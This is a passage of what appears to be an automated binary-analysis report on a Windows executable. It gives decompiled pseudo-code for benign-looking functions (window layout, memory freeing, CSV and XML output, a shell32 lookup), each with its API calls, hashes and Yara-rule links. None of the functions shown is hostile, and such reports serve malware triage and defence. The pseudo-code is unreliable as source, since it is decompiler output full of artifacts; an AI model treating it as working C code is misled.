					_push(_t32);
					L0040E032();
				}
				_t33 =  *((intOrPtr*)(_t27 + 0xc));
				if(_t33 != 0) {
					E00406355(_t33);
					_push(_t33);
					L0040E032();
				}
				_t34 =  *((intOrPtr*)(_t27 + 8));
				if(_t34 != 0) {
					E00406355(_t34);
					_push(_t34);
					L0040E032();
				}
				_t18 = _t27;
				_pop(_t35);
				_push(_t27);
				_t36 = _t18;
				_t28 = 0;
				if( *((intOrPtr*)(_t36 + 4)) > 0 &&  *((intOrPtr*)(_t36 + 0x3c)) > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E00407588(_t36, _t28))) + 0xc))();
						_t28 = _t28 + 1;
					} while (_t28 <  *((intOrPtr*)(_t36 + 0x3c)));
				}
				_t11 =  *((intOrPtr*)( *_t36))();
				free( *_t11);
				return _t11;
			}

0x004076f4
0x004076f7
0x004076fd
0x00407702
0x00407707
0x00407709
0x0040770e
0x0040770f
0x00407714
0x00407715
0x0040771a
0x0040771c
0x00407721
0x00407722
0x00407727
0x00407728
0x0040772d
0x0040772f
0x00407734
0x00407735
0x0040773a
0x0040773b
0x00407740
0x00407742
0x00407747
0x00407748
0x0040774d
0x0040774e
0x00407750
0x00407757
0x00407758
0x0040775a
0x0040775f
0x00407766
0x00407770
0x00407773
0x00407774
0x00407766
0x0040777d
0x00407781
0x00407789

APIs

Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9

??3@YAXPAX@Z.MSVCRT ref: 0040770F
??3@YAXPAX@Z.MSVCRT ref: 00407722
??3@YAXPAX@Z.MSVCRT ref: 00407735
??3@YAXPAX@Z.MSVCRT ref: 00407748
free.MSVCRT(00000000), ref: 00407781

Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,74B04E00,?,00000000), ref: 0040635C

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fed31934c8ca2d006947c88f4fde5997effb1b6458a607f602b4779a4b9fefa7
Instruction ID: c8a6b3cb51e6e8f56dec58333c0ea0519a89c45fbe64381fe3d5b910dcd78a78
Opcode Fuzzy Hash: fed31934c8ca2d006947c88f4fde5997effb1b6458a607f602b4779a4b9fefa7
Instruction Fuzzy Hash: 9901C232E099305BC6257B3AD40191EB3A9AE80BA0316453FE905B73D1CB7C7C518ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00406B34, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B34(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t31;
				struct HWND__* _t33;

				_t31 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t33 = GetParent(_t31);
					GetWindowRect(_t31,  &_v20);
					GetClientRect(_t33,  &_v36);
					MapWindowPoints(0, _t33,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t31, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00405D0F(_t31, 0x400000);
				}
				return 1;
			}

0x00406b3f
0x00406b42
0x00406b4c
0x00406b53
0x00406b5e
0x00406b6e
0x00406b7c
0x00406b84
0x00406b8a
0x00406b90
0x00406b95
0x00406b9d
0x00406ba3
0x00406ba9

APIs

GetParent.USER32(?), ref: 00406B46
GetWindowRect.USER32 ref: 00406B53
GetClientRect.USER32 ref: 00406B5E
MapWindowPoints.USER32 ref: 00406B6E
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00406B8A

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
Instruction ID: 8e7a0edbc95fdcc56b15363f287b575cc5c7f3f2b2b94fa66e9be29a0ee7bcd8
Opcode Fuzzy Hash: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
Instruction Fuzzy Hash: 48015732400129ABDB219BA59C49EFFBFBCEF06714F04413AF901F2080D778A5058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409F23, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409F23(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040E038();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040E032();
				return _t20;
			}

0x00409f23
0x00409f29
0x00409f30
0x00409f31
0x00409f32
0x00409f3a
0x00409f3d
0x00409f3f
0x00409f48
0x00409f4b
0x00409f4e
0x00409f50
0x00409f53
0x00409f5a
0x00409f64
0x00409f6e
0x00409f73
0x00409f76
0x00409f79
0x00409f7c
0x00409f7f
0x00409f80
0x00409f85
0x00409f86
0x00409f89
0x00409f91

APIs

??2@YAPAXI@Z.MSVCRT ref: 00409F32
memcpy.MSVCRT ref: 00409F5A
memcpy.MSVCRT ref: 00409F64
memcpy.MSVCRT ref: 00409F6E
??3@YAXPAX@Z.MSVCRT ref: 00409F89

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: b86c0dfcea20ed5943c2189175d4b50205f28c5c643965f5f8caf492287ebdb1
Instruction ID: 9c944120e002927f8eec2413523e8dcd2a94c32319e751658ec61dd6637171fa
Opcode Fuzzy Hash: b86c0dfcea20ed5943c2189175d4b50205f28c5c643965f5f8caf492287ebdb1
Instruction Fuzzy Hash: C0012172C00118BBDF106FAAD8819DEBFB9EF44394F10807AF808B6152D6755E559B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040768E, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040768E(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x38));
				if(_t9 != 0) {
					_push(_t9);
					L0040E032();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x48));
				if(_t10 != 0) {
					_push(_t10);
					L0040E032();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2e4));
				if(_t11 != 0) {
					_push(_t11);
					L0040E032();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2cc));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040E032();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040E032();
				}
				 *((intOrPtr*)(_t19 + 0x2cc)) = 0;
				 *((intOrPtr*)(_t19 + 0x38)) = 0;
				 *((intOrPtr*)(_t19 + 0x48)) = 0;
				 *((intOrPtr*)(_t19 + 0x2e4)) = 0;
				return _t11;
			}

0x0040768e
0x0040768e
0x00407697
0x00407699
0x0040769a
0x0040769f
0x004076a0
0x004076a5
0x004076a7
0x004076a8
0x004076ad
0x004076ae
0x004076b6
0x004076b8
0x004076b9
0x004076be
0x004076bf
0x004076c7
0x004076c9
0x004076cd
0x004076cf
0x004076d0
0x004076d6
0x004076d6
0x004076d8
0x004076d9
0x004076de
0x004076e0
0x004076e6
0x004076e9
0x004076ec
0x004076f3

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040769A
??3@YAXPAX@Z.MSVCRT ref: 004076A8
??3@YAXPAX@Z.MSVCRT ref: 004076B9
??3@YAXPAX@Z.MSVCRT ref: 004076D0
??3@YAXPAX@Z.MSVCRT ref: 004076D9

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 215cdfd6d564a20a082406ff577ac5ffa07c94b36e2e8180bf1e91046972ff33
Instruction ID: 342c1f177218003cdd1623b0f4e7fc54ae999312f226978e8e9af0a1ecb46938
Opcode Fuzzy Hash: 215cdfd6d564a20a082406ff577ac5ffa07c94b36e2e8180bf1e91046972ff33
Instruction Fuzzy Hash: F1F03C72949A515BC724AE6ED8C485BB3E9AB043647604C3FF14AE3690CA39BC904A1C

Uniqueness

Uniqueness Score: -1.00%

Function 00403054, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403054(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __esi;
				intOrPtr _t15;
				struct HDWP__* _t31;
				intOrPtr _t34;
				RECT* _t36;

				_push(__ecx);
				_t34 = __ecx;
				_v8 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t15 = _a12;
							 *((intOrPtr*)(_t15 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t15 + 0x1c)) = 0x78;
						}
					} else {
						E00401810(__ecx + 0x40);
					}
				} else {
					_t31 = BeginDeferWindowPos(3);
					_t36 = _t34 + 0x40;
					E004017E9(_t36, _t31, 0x3f1, 0, 0, 1);
					E004017E9(_t36, _t31, 1, 1, 1, 0);
					E004017E9(_t36, _t31, 2, 1, 1, 0);
					EndDeferWindowPos(_t31);
					InvalidateRect( *(_t36 + 0x10), _t36, 1);
					_t34 = _v8;
				}
				return E004015CE(_t34, _a4, _a8, _a12);
			}

0x00403057
0x0040305e
0x00403060
0x00403063
0x004030b9
0x004030c9
0x004030cb
0x004030ce
0x004030d5
0x004030d5
0x004030bb
0x004030be
0x004030be
0x00403065
0x00403076
0x0040307d
0x00403081
0x0040308c
0x00403098
0x0040309e
0x004030a9
0x004030af
0x004030b2
0x004030ef

APIs

BeginDeferWindowPos.USER32 ref: 00403068

Part of subcall function 004017E9: GetDlgItem.USER32 ref: 004017F2

EndDeferWindowPos.USER32(00000000), ref: 0040309E
InvalidateRect.USER32(?,?,00000001), ref: 004030A9

Strings

$, xrefs: 004030C5

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$BeginInvalidateItemRect
String ID: $
API String ID: 4234876885-3993045852
Opcode ID: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
Instruction ID: 5bd367454bd051cdd9e75425df65f1b17fedc8d2c9609545a756db00ac89be97
Opcode Fuzzy Hash: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
Instruction Fuzzy Hash: 65119171140208FFEB215F51CCC5F6F3AACEB05799F10403AF5053A1D0D675AE459BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409457, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00409457(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E004086F5(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t26, _t26, _a4,  &_v1028);
			}

0x00409460
0x00409479
0x0040947b
0x00409480
0x00409492
0x0040949e
0x004094a2
0x004094a8
0x004094af
0x004094b0
0x004094bb
0x004094c0
0x004094c1
0x004094dd

APIs

memset.MSVCRT ref: 0040947B
memset.MSVCRT ref: 00409492

Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D

_snwprintf.MSVCRT ref: 004094C1

Strings

</%s>, xrefs: 004094B0

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
Instruction ID: 85b546f447cb05eec590fc4b387cecce4986b1e61cf39ba9e2c32341b3a77f5f
Opcode Fuzzy Hash: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
Instruction Fuzzy Hash: AE0186B3E0012966D720BB55CC45FEA767CEF45318F0004BABB09F71C2DB789E558A98

Uniqueness

Uniqueness Score: -1.00%

Function 00406C43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406C43(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040E340(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x412ec8; // 0x0
				}
				_t25 =  *0x412c38;
				if( *0x412c38 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00406CC6(_t12);
					if(E00406D72(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00406BAC, 0);
				}
				return _t9;
			}

0x00406c43
0x00406c4b
0x00406c51
0x00406c55
0x00406c57
0x00406c57
0x00406c5d
0x00406c65
0x00406c67
0x00406c7d
0x00406c82
0x00406c85
0x00406c86
0x00406ca1
0x00406cad
0x00406cad
0x00000000
0x00406cbd
0x00406cc5

APIs

memset.MSVCRT ref: 00406C7D
SetWindowTextW.USER32(?,?), ref: 00406CAD
EnumChildWindows.USER32 ref: 00406CBD

Strings

caption, xrefs: 00406C92

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
Instruction ID: 29de1f336f9b1ad8a88558a0c2ea7e463315901b0f4d8a0f0fc28385d02cb639
Opcode Fuzzy Hash: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
Instruction Fuzzy Hash: 2DF0A472900314AAFB30AB55DD4AF8A3768DB04714F1100B6FA05B71D2D7B8ADA4CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405954, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405954(struct HWND__* _a4) {
				void _v514;
				short _v516;
				signed int _t11;

				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fe);
				GetClassNameW(_a4,  &_v516, 0xff);
				_t11 =  &_v516;
				_push(L"edit");
				_push(_t11);
				L0040E03E();
				asm("sbb eax, eax");
				return  ~_t11 + 1;
			}

0x0040595d
0x00405973
0x0040598a
0x00405990
0x00405996
0x0040599b
0x0040599c
0x004059a4
0x004059a9

APIs

memset.MSVCRT ref: 00405973
GetClassNameW.USER32 ref: 0040598A
_wcsicmp.MSVCRT ref: 0040599C

Strings

edit, xrefs: 00405996

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName_wcsicmpmemset
String ID: edit
API String ID: 2747424523-2167791130
Opcode ID: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
Instruction ID: 748b3c7a54d916a83871e5d55f64a5683e5b8dafeb1aa9d8bd9837731e8c37d4
Opcode Fuzzy Hash: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
Instruction Fuzzy Hash: D7E0927298031E6AEB20EBB0DC4AFA577ACAB04708F4006B5B914F10C2EAB4964A4A44

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA9D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x413268 == 0) {
					_t1 = LoadLibraryW(L"shell32.dll");
					 *0x413268 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x413264 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040daa4
0x0040daab
0x0040dab3
0x0040dab8
0x0040dac0
0x0040dac6
0x00000000
0x0040dac6
0x0040dab8
0x0040dacb

APIs

LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0

Strings

shell32.dll, xrefs: 0040DAA6
SHGetSpecialFolderPathW, xrefs: 0040DABA

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 2574300362-880857682
Opcode ID: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
Instruction ID: 122d2585c685c0691ad6c3d54d7046cb00117d102b384f1c3bcadfb2245e5d9f
Opcode Fuzzy Hash: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
Instruction Fuzzy Hash: 5ED0C9F0A59300AAD720AF65AE097923AA4AB40713F149576E804F12B0D7B881C8CE6C

Uniqueness

Uniqueness Score: -1.00%

Function 00408885, Relevance: 6.1, APIs: 4, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00408885(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				wchar_t* _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				wchar_t* _t63;
				wchar_t* _t64;
				void* _t68;
				void* _t69;
				intOrPtr* _t71;
				wchar_t* _t79;
				wchar_t* _t83;

				_t68 = __ebx;
				_t79 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t68 + 0x38)) + _v8 * 4);
						_t71 = _a8;
						if(_t71 != _t79) {
							_t83 =  *((intOrPtr*)( *_t71))(_t39,  *((intOrPtr*)(_t68 + 0x68)));
						} else {
							_t83 =  *( *((intOrPtr*)(_t68 + 0x2e4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t83, 0x2c);
						_pop(_t69);
						if(_t41 != 0) {
							L10:
							_v36 = _t79;
							_v32 = _t79;
							_v28 = _t79;
							_v20 = 0x100;
							_v24 = 1;
							_v16 = 0x22;
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t83 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t81 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E004063DD(_t48, _t69, _t81, __eflags);
								_t83 =  &(_t83[0]);
								__eflags = _t83;
							}
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							_t53 = _v36;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40f454;
							}
							E00408857(_t68, _t69, _a4, _t53);
							E00406355( &_v36);
							_t79 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t83, 0x22);
							_pop(_t69);
							if(_t62 != 0) {
								goto L10;
							} else {
								_t63 = wcschr(_t83, 0xd);
								_pop(_t69);
								if(_t63 != 0) {
									goto L10;
								} else {
									_t64 = wcschr(_t83, 0xa);
									_pop(_t69);
									if(_t64 != 0) {
										goto L10;
									} else {
										E00408857(_t68, _t69, _a4, _t83);
									}
								}
							}
						}
						if(_v8 <  *((intOrPtr*)(_t68 + 0x34)) - 1) {
							E00408857(_t68, _t69, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t68 + 0x34)));
				}
				return E00408857(_t68, _t69, _a4, L"\r\n");
			}

0x00408885
0x0040888c
0x00408891
0x00408894
0x0040889b
0x004088a1
0x004088a4
0x004088a9
0x004088c2
0x004088ab
0x004088b4
0x004088b4
0x004088c7
0x004088cf
0x004088d0
0x0040890c
0x0040890f
0x00408912
0x00408915
0x0040891f
0x00408926
0x0040892d
0x00408934
0x00408959
0x00408959
0x0040895c
0x0040895f
0x00408962
0x00408965
0x00000000
0x00000000
0x0040893b
0x0040893f
0x0040894e
0x00408951
0x00408951
0x00408941
0x00408941
0x00408946
0x00408946
0x00408952
0x00408958
0x00408958
0x00408958
0x0040896e
0x00408973
0x00408976
0x00408978
0x0040897a
0x0040897a
0x00408985
0x0040898d
0x00408992
0x00408992
0x004088d2
0x004088d5
0x004088dd
0x004088de
0x00000000
0x004088e0
0x004088e3
0x004088eb
0x004088ec
0x00000000
0x004088ee
0x004088f1
0x004088f9
0x004088fa
0x00000000
0x004088fc
0x00408902
0x00408902
0x004088fa
0x004088ec
0x004088de
0x0040899b
0x004089a7
0x004089a7
0x004089ac
0x004089b2
0x004089bb
0x004089cd

APIs

wcschr.MSVCRT ref: 004088C7
wcschr.MSVCRT ref: 004088D5
wcschr.MSVCRT ref: 004088E3
wcschr.MSVCRT ref: 004088F1

Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID:
API String ID: 1983396471-0
Opcode ID: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
Instruction ID: 891d09ae9378dccf635ba886e12c54397b7589aa880eb7d9b0c0a307a2786e7e
Opcode Fuzzy Hash: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
Instruction Fuzzy Hash: 5B41B431900214ABDF10FEA5C941AAE7BB8EF04328F50853FF891F72C2DB7899458A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A084, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040A084(void* __eax, void* __eflags, wchar_t* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				signed int _t57;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				void* _t76;
				signed int _t80;
				wchar_t* _t91;
				void* _t92;
				void* _t94;
				void* _t95;

				_t76 = __eax;
				E00407A66(__eax, __eflags);
				_v12 = 0;
				_t57 = 0;
				while(1) {
					_t91 = _a4;
					if(( *(_t91 + _t57 * 2) & 0x0000ffff) + 0xffffffd0 > 9) {
						break;
					}
					_t57 = _t57 + 1;
					if(_t57 < 1) {
						continue;
					}
					_t71 = wcslen(_t91);
					if(_t71 >= 3) {
						break;
					}
					_push(_t91);
					L0040E062();
					if(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t76 + 0x34))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t76 + 0x38)) + _t71 * 4) * 0x14 +  *((intOrPtr*)(_t76 + 0x2e4))));
					}
					L19:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t80 =  *0x4131d4; // 0x1
					_t58 = _v12;
					 *0x4131d4 =  *0x4131d4 + 1;
					 *((intOrPtr*)(0x4131d8 + _t80 * 4)) = _t58;
					return _t58;
				}
				__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
					L14:
					_t92 = 0;
					__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
					_v8 = 0;
					if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
						goto L19;
					} else {
						goto L15;
					}
					do {
						L15:
						_t60 = E0040546C( *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4)) + 0x10)), _a4);
						_t62 = E0040546C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x48)) + _t92 + 0x10)), _a4);
						_t95 = _t95 + 0x10;
						__eflags = _t60;
